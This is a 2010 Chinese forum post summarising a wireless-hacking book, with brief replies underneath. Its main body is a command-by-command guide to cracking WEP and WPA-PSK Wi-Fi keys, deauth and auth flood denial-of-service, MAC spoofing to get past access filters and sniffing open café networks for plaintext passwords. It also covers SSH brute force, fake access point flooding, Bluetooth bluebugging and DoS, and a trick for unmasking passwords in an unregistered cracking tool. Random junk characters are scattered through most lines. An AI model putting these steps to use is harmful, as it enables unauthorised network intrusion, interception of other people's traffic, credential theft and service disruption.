格西欧解决方案
树熊
查看: 9425|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3717

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
  k; u* p# d& A; k
* ]/ y4 h- P+ q6 J% x+ R4 u以下所有操作均在BackTrack 4中进行。: ?$ c4 k) x+ |4 n- M: h$ P8 b
& Q+ Q  W! z/ _* R3 \( s

7 o' ]/ i  i& J& Z4 ^无线WEP加密P解:
8 k7 D, s! }+ t& O, g
5 l( Y  z1 k! n) P1 s2 S% H& A注入P解:" {5 Q! b6 h; E4 X- a! T
1 ^4 b3 T) y, z" O
ifconfig
, ~. r# N* c( r2 a
- R  ~9 _' S6 r6 Y+ m: d$ i# A9 Vifconfig –a
6 ^  s$ @% J2 n/ `9 n" q9 Z; Q. E8 f
ifconfig wlan0(无线网卡) up
. }! x" T/ T. [" w# S- c- N; l4 T
5 B2 ]. G$ h& n: B+ i* Oairmon-ng start wlan0
+ M# y8 q+ b  H8 S& ~4 Q7 Y) ~2 j# {4 |" }6 ]
airodump-ng mon0
% c9 }; D, a% ?: `- I& B% _
% x1 g6 g- u3 i3 N  d9 tairodump-ng --ivs –w ivsfile –c 频道 mon0或& S( b& L$ [; R/ r: C9 c) Y3 b7 U8 o

. K! k7 o% u( k' D. e- l3 w# Mairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0: z% ~9 y8 h5 x8 r& ]1 F  M

1 w9 v# p- M# V' b/ `7 Taireplay-ng -3 –b BSSID –h Station mon0
7 K# ^5 C+ g, ~/ Q' l0 X7 S6 i  F1 U7 @. @9 O" A; S/ j  a
aircrack-ng ivsfile-01.ivs1 \8 {8 l" A& t5 D7 z

7 `9 S! Y+ J" ~. \& t: g虚连接P解(适用于无客户端连接APP解)
% k8 `5 A% F5 d% q! T$ C
, W% B" g1 t. h4 X! Y! Cifconfig
% u) u/ k' |$ i! a* t6 q# r/ U* J2 Z3 A6 F  m+ C" S
ifconfig –a5 ]5 y# M: X7 R8 D) x

4 p* I  U6 R$ c% v5 a7 aifconfig wlan0(无线网卡) up
/ w, K( T, _# I, N$ z$ O* z7 |9 M1 }  o# J8 K7 e# _6 M* }; s3 r8 x
airmon-ng start wlan0' m4 X  c/ f0 H" F* P+ m
# A; N$ w2 \6 A# O( _3 D0 @, d; d
airodump-ng mon0$ S1 _4 c* c  B* A! h$ d
& n4 e$ w1 P4 P: u6 f1 B- O
airodump-ng --ivs –w ivsfile –c 频道 mon0或
; H" s3 n5 F8 f- W! I: t2 R) i0 T! |- \
* S+ x. d) Y/ H1 R2 Yairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0  q1 I3 `+ u4 m- J
7 ?+ C* E# z- V
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0' Y: t$ B4 Z6 |+ A" h2 ]

# B/ w0 F% U/ W5 h! j( n! R0 |! uaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
' p% C5 [; \& g  V9 |5 F& X; U9 ~# F8 ~$ ]! _
aircrack-ng ivsfile-01.ivs
$ H1 d2 h  i; E- @/ ]4 i2 o  Y) S
6 W2 K5 w" y# ]; d. Z' s" W9 ?
& T6 F" _7 X; j# A3 Y& o& U; ]8 e还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。( U: M- A/ ?. ]6 Q) d% ]: {& r

7 y' ]+ k" i( l+ L
, o. ]4 W- ?: Y: H3 G  fWPA-PSKP解2 G- Z& K* [& U4 C" K! N

. C% S& b# d2 f, |ifconfig6 s2 v' @8 f+ r& E2 E
! E  H$ c, c# E" ]: c
ifconfig –a
% Q8 c& p. @  l, v6 R  T* b! Y
1 D1 Z. F' S& Fifconfig wlan0(无线网卡) up
& q% n5 N+ I' I; h9 |/ C8 j
- Q' E- L9 n. R  j+ [. [" C+ q! A) [% Gairmon-ng start wlan0+ y( n5 ^, ^" L
* T- h9 i! y; H& ]4 l: |! R7 F
airodump-ng mon07 }+ C; X( `; M: _6 ?1 W6 ~6 O
! Y: w1 k- ~% j) H5 K8 l
airodump-ng –w capfile –c 频道 mon00 c3 \5 t) ]) N! t: z- s

4 F0 C6 ^4 }9 ^8 x6 ^aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
- f* r# ~1 V' \1 q" H
3 c0 W! {# `5 uaircrack-ng –w Dic capfile-01.cap或' t' z2 A# A- m7 Z

- m* W' U" T, k$ i( U  rcowpatty –f Dic –r capfile-01.cap –s SSID
+ B4 ~/ ]/ v0 y) k8 h+ A9 @( L0 y1 \- E: a7 K; ]
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID: l. @# I4 n8 w2 s: H3 p
) y7 C' H" b% d( M
傻瓜式P解软件SpoonWPA。! @5 Q6 r; o) ~( {7 a! L1 r
3 D# q* U7 d. J, }4 q5 d4 q
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
1 B+ q" b' r! @& B1 l4 H0 h$ l: ?
) d* U3 u: v# J  M, U  T7 \
% d" Y3 g. [: o7 _6 z' F0 E7 L  u# u字典文件的生成和上传
. w8 L) L9 o2 c
5 H4 j. a6 H% ]+ Y8 u6 N' ]在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。+ Y7 I1 Q6 U3 G
- m0 P% ~9 p' ?* _/ W7 l- I
5 e  S$ J1 k7 t* X8 J" o* K4 I% b; w. [
BT4下开启Tftp:Services—TFTPD—start TFTPD7 t/ x7 S( w2 A0 R/ |
( o) m- ?/ e5 Y. B5 h
在Windows的CMD中运行 tftp –i IP put **.dic1 F( s$ M  q  _0 v, E* y
" J1 v3 L: r4 L. x
8 Y0 h' T+ W- r( J' V
BT4下开启SSH:Services—SSH—start SSH8 W6 S7 W& |: T5 N! P5 O; w9 W

/ h/ s; F9 {1 K8 i. hWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root, O' y) y" }+ u1 A/ Y! L

3 b8 \8 \. J+ m. K- ^. q! X+ Y. c+ W1 u9 y! A) J/ @
AP限制MAC时的解决; J* ]' W, M, `, a0 I" S5 O% C

1 k+ z; `, @$ p8 m6 H4 p) C当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:! W$ ~5 n, a: P. J! j9 C. p9 h( r
) A" H9 V+ _9 A* j% {3 H% h
ifconfig wlan0 hw ether NewMAC$ O' P8 z6 p8 j! Z- B* i6 D8 y
# `: y. |! S0 q6 J/ X8 t7 e  H

8 H: M1 v- D0 i2 M2 B/ r. C4 s关闭SSID广播的AP探测:
. x+ i" y7 f$ i
# J7 |) v" X( o* u1.     Deauth攻击:
& D. |9 `, j+ o, C& z+ K7 c7 O9 \* @
airodump-ng mon0
5 v7 N5 v2 v' C+ Y/ K1 ?; `; V) s7 u
aireplay-ng -0 10 –a BSSID –h Station mon0$ [' v7 v2 ^( G' S/ ^

/ f! t- z# X9 A, \0 U5 H- B4 R2.     抓包分析
2 f: E! _" O* R5 r! a+ z1 ?: p. a" o2 J
Omnipeek- e. \0 Q: f7 K2 ]% T  b  j) Z
( Z5 |$ M) i7 X8 T. P
Tcpdump –n –e –vvv –i 网卡名1 F4 j$ W+ h: i: Y* |

8 _! e0 J# k! [/ u3.     暴力P解& @$ {0 T7 L& R/ i8 F$ y+ L

4 O( ]$ ~$ {1 ^; u/ E4 N" k9 LCharon 1.1暴力P解
8 S/ n8 B$ }  A' D" O# X0 [& d% b5 E
- k. O7 ?6 J! ]/ I9 P$ D* V* r
( q  A% k; u1 Q" C7 P0 }& K  L1 X无线加密数据包的解密/ z  ^2 {: w- l( |; z: s
$ c; B' @/ m9 B6 ~: N. r

$ r) P! `) ^3 o4 M$ z" S% n/ x. [使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
) q) b  _$ P% P6 P! K4 |1 v
7 d7 z1 o# S; o) m& e; v, wFilterNS     DNS解析数据包1 F# A! y" |7 I% f0 G

* j+ L/ q+ Y5 I. fFilter:HTTP    WEB访问数据包( d# z# p" q( w# c3 I

% w; Q- O$ @- C; ^Filter:msnms   MSN" \! _' A" B2 N% o: L' V8 f

' U. S: T. b/ o  Y9 |Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
9 W% ^7 J# x, s5 s+ j' e/ Y
# g& L+ d& O6 x7 l! |3 R使用airdecap-ng解密:, i4 q7 u$ Z# E$ F
7 f* ^; n$ n( F: ~2 ?: Y- [( K6 w
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap! v4 G1 W) D) t2 c6 W
) M  z8 ^# a" @/ C$ Y0 I5 h
- m7 H( d: S; l2 h, A, h
咖啡馆中无线数据截取(开放式无加密AP)2 X- B* M+ D3 T/ d

' m7 [$ S- {) j* |1.Airodump-ng –w data –c频道 mon0) F6 T5 Z) [0 v& v7 @# Z
# V  `% H( z- o4 R
2.使用WireShark打开分析
1 k- e" I2 h( H2 B  Z- J  l6 e& M( x& S
: W3 q  ]+ S5 v9 D2 C# ]) U
BT4下的渗透工具:" Y3 [' [: F& ]

* m9 j, V& m; \' d" R  {nmap –sP IP/24        判断C段下存活的主机 ! ^9 l6 ^. F5 g/ \' X2 `
  ?( g- b+ o9 x) S  H/ r$ e& A
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
$ b& x( T" d, i  E$ E+ U2 Q) O/ L4 ]% ]9 O' k& _, ]4 n
nmap –vv –sV IP –p port   指定端口的详细信息。。。# u6 t' ~6 x9 c" ?7 ^

" s6 f! e: f; n+ ?- j2 `8 F0 V$ c9 wnamp –O IP/24    判断主机的系统版本+ ?- I2 U( U, U+ O- M

+ C3 f5 L  U0 L* `6 ?' b
+ N. ?: ^3 Z4 G# g0 BGUI 版nmap:Zenmap 6 w( [/ u& o3 P  ]

( ]- k+ q8 g  e0 b3 N5 \( x2 H7 J1 y$ W7 Z) b$ @
Amap使用:amap –B IP port
" i% y, F4 m+ c4 r. u: y7 C5 \: t; h3 ?- y
Nbtscan(扫描Windows网络NetBios信息):" R  P5 n6 }9 V+ v% A
3 [5 O) Q& Y+ ~  c
nbtscan –v –s : IP/245 k' b9 ?" C8 L6 [
" j# S) H0 a. q: @, F4 h
nbtscan –r IP& e+ L8 Y2 K2 Q- @9 ?
0 S. M/ B8 b/ A0 Y8 ?2 C. T
* S7 [' u* j  r! q: u
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
% J& ~9 [; t% o' D( B2 H
. B, u; Y' O$ M  b! G( t; v5 j" X- [% Z. {+ d* G; L  K! D
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
; {* I% c: l/ D* K2 k6 s) K% C% X/ c2 l/ p% N* K! M+ w; T
BruteSSH: ./bruthe.py –h IP –u Username –d Dic
5 w) A+ F* N3 _! g6 p% f
. D( w& p5 K3 C$ |/ ]/ z1 OMetasploit3使用
! E: F- M; \/ g无线D.0.S
: p5 j2 C6 y: {8 s+ c+ k
# [4 _+ h0 }7 L  }) g4 c, q# l; U- h: ^9 j# S3 ^2 F9 _2 ^+ Y. ?
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
& O" O1 P! H* C+ Y8 }- i; T: S$ t, n3 h" Z$ L, E
airmon-ng start wlan0+ _! h2 S0 q" b& U: |2 a6 ], w

4 a1 f' s; }0 b7 @airodump-ng mon0! O, j6 r) O1 _6 U& G3 L

# j* ?& x7 p3 H7 tmdk3 mon0 a –a BSSID$ ]# d! i# V# G3 y. w# ~! g
% T! H+ M/ d. }1 V: P7 Q& d* t
对所有的AP攻击:mdk3 mon0 a
- n6 P, ]% d" j2 m/ y9 ~/ `) V& p1 Z" o2 {8 x: U; w

3 Q8 a# |. R0 F0 y1 RDeauth Flood 攻击$ |; i' z2 Q( H

7 @, |' {( X1 X9 Q/ O; z+ k. Q2 M: I, omdk3 mon0 d –c Channel
( D8 e8 @" x. R* _( H; I/ o! i) h$ Q) J
图形化D.O.S攻击:Charon
9 w9 s, d+ H4 F1 ], B7 h2 I$ W% G" y" P2 u6 |
4 l4 b! ?3 b3 |8 N- A. q$ C
当受到攻击时,使用Wireshark抓包可以看到异常信息。
$ S' K* L$ t, y* t4 c; c
( X9 }' z1 O# T7 n+ s+ A% O+ n1 }  w0 d$ Z; H) X% p
WPA-PSK高速P解
% ~5 J! J6 O, v& i
# K# y. W* L0 g6 |" G1.       WPA-PSK PMK Hash TablesP解
# `* f% e1 i5 R! G3 X( [! h+ L5 ^3 x
1 [9 Z6 @# i/ I* `: a/ eCowpatty –d HashTable.hash –r ***.cap –s SSID2 c+ n% R. h* e) c# m( m% A; c  {
& ]# l" A- P1 R9 d3 X
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID, Q1 F) o0 }, ]
; ^" i8 c' Z' ~+ D9 a
2.       GPU辅助高速P解
7 R. j, e/ K8 }) P: S0 w# O/ T. i( y* w" B5 F9 \$ [" |( A# h4 y
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
7 e2 Y+ j, u  o& e6 ]4 X& L8 [0 N: A
3.       分布式P解4 j# e: V- F' l4 M! m+ c

& e) @" {  A7 L9 W, X$ c6 l# P3 F8 c8 K- r* K# e. T
AP的伪造. B. L  Y6 C  U- q, m

1 W5 M. b% e) b" E; J; W把AP的MAC改成目标AP的MAC
2 \6 r' u7 y9 Z
% r2 i1 `) K0 a8 G网卡软AP% ^; Q: _5 q, z" ^
1 g' p! c! a! ?7 j
3 V% ~$ ^1 {) X6 t! ^3 X6 U' d% W5 x
伪造大量虚假AP信号:6 D& E9 C3 m! B+ z3 f5 u, H. f

5 s1 k, m5 ~3 M5 R3 _5 Z随机SSID:mdk3 mon0 b –g –c 频道
9 Y5 w. V/ j1 \) O" v* q* I5 R/ N1 ]. i+ C+ h+ H: @" P
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度: b: `2 M) g$ Z1 H

7 f( I, B0 m& n# K0 y* ^% W" N' }9 x$ M" G3 S( b
War-Driving
3 m/ N& p  ]5 [' n
, e; C: C* Z1 K9 s# y热点地图绘制
9 e- @% _1 _( A6 [: ^/ {5 p7 k7 ?( ]; X8 X. C9 L
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
$ J, d( w5 {  j* ~2 }& }0 P0 o& i) P* I: G/ ^

) k9 B6 {: C& z: X4 XNetstumble
& }/ O3 ^, @, c7 U$ K% B; t. j/ `+ X1 d7 h! A9 v  N% h: h# F! Z

3 g- {. e" R" `& y* O( o# t3 o( l蓝牙Hacking) _" f% c$ G% w

7 T- C8 `/ G; N# T' T( B+ r' ]Windows下的Blue Soleil工具
  V- Y+ o+ }- b3 d( H5 `2 J1 S; \# S4 G
BT4:
% T; C0 f* r: ^8 c/ F6 b; @
, g) p& z. j) [8 D  chciconfig 查看蓝牙适配器" N! l' a  r5 i- @3 r0 b6 v3 z2 C5 k

1 r4 O5 t# L: f# |$ M3 X/ J/ ^% Fhciconfig hci0 up 载入蓝牙适配器0 U' e% W7 g; A5 g. O7 a* k

3 }: G. f8 E) d/ Q- ^6 qhciconfig hci0 class 蓝牙适配器详细信息) x0 N$ ^  k$ U' k" K9 D- e7 C- p
, Q# f- g) V' B7 R

$ U  f3 r( ~" o+ {/ rhcitool(扫描蓝牙)
% H- x3 }& Z  n# m. L# g! U7 s+ N6 M
hcitool –i hci0 scan
* Y, H- f6 y$ ?, Z- K- c+ t" A+ t/ @4 H, U1 L" t
BTscanner(扫描蓝牙)8 h' _- b$ s- P; X  P/ R
' ], Y7 }$ i' r$ W
1 I, u6 m" ?7 ]+ \) t3 C$ w$ \
蓝牙攻击:
  C. r; a' e0 R8 r
4 m0 K" p7 d+ E0 s! y  hBlueBugging (适用于BlueTooth V1.1的手机)
! m; E1 o7 a$ h- k. c
: y+ }, `5 e8 c. y5 ABluebugger工具:
- q- x3 h' ]" R4 `2 d+ [: l( I1 Y# f0 ?. n7 W* p
Bulebugger –a HD_Addr info$ D* k1 }# G$ A% _' {$ N
% @) S( k! t; h

+ I" j) ~4 x0 B/ ~BlueJacking
) [. G& E" N4 H
( \( C6 m& C1 q% r实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
6 Q* u1 E# y8 R# R% x7 Q2 g8 s6 J" [- S; S

0 Z! L3 K' ^* j* G8 Y  o5 V/ ZHD_Addr修改:
2 ^; a+ x; E8 Q$ J: k/ q
; t% M( X; L. f# h6 i- B$ q/ CBdaddr工具
8 H; m2 O0 E2 \7 X
8 g3 f# ~% _: V) U( Wbdaddr –i 蓝牙设备名 新HD_addr$ k% Q$ N8 X1 a& b" H. D4 g
4 z. w. p/ R" V# M7 k8 l
. O- m% H" q$ ]4 r" z0 p7 Q
蓝牙D.O.S8 ^2 n6 c# [& K7 b/ K/ h9 v& G% A

! E  [  Q6 R6 v" c+ y6 k2 ?l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
! ?" q( E' u6 M! g( T. g% F$ X( y, F/ C9 y1 r& `6 }/ W0 b
hciconfig
1 y* \' H' Z3 g4 c7 s5 R/ `5 H% L
. [5 ]7 s' o7 ^* ?3 `2 a. _' Thciconfig hci0 up
- |+ V9 @9 @9 B$ G- e- u( o. _4 Q0 j& b$ _
hcitool –i hci0 scan
# p& E; n8 Y- ^( h7 X* I
7 J. a' ^) T6 |* i8 ~( g  Ol2ping –s 10000 –目标MAC
  j7 l1 M3 S. U" n" `: B; D' X2 m' p: s
* r2 K4 Y7 O' e5 b' N) Z" ?
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
! }" X5 k  g7 l6 \! a
. ^4 O3 Z! s: X( y8 b% t, n- `3 c" P./fang –r ************-############ -s. }- ^+ V8 N0 f3 O

: A% B+ Y2 E" j5 p3 ?. M暴力P解************-############的蓝牙设备
" x) k3 i! Q6 M  Y  s8 R5 o$ W5 P/ n# W; Z1 c5 |- U
./fang –l 各厂商BD_Addr分配
7 ^# ^7 U/ W) y5 E& i6 u  y# F
, [  H) T0 X( Q1 v9 A+ R) w, n
* J6 ?7 C" G# H+ R  x: kWifiZoo使用' \% z2 |/ Z  p/ N
3 k  @6 D+ S8 d% b
./wifizoo.py –c Capfile
+ f6 c  v$ J/ K. S: b' O
% I2 x+ x  `* Y9 w, c访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

256

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

711

积分

中尉

该用户从未签到

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
6 r# M9 c: c; l+ F借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
4 Q! n/ b$ ~; X9 [: Q0 R" P呵呵 其实也不贵 21块 快递再一点0 G) r% H! }) t1 E1 _5 ]! ^
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )      小黑屋 | 免责声明

GMT+8, 2015-4-25 22:25 , Processed in 0.179083 second(s), 15 queries , Gzip On ,Memcache On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表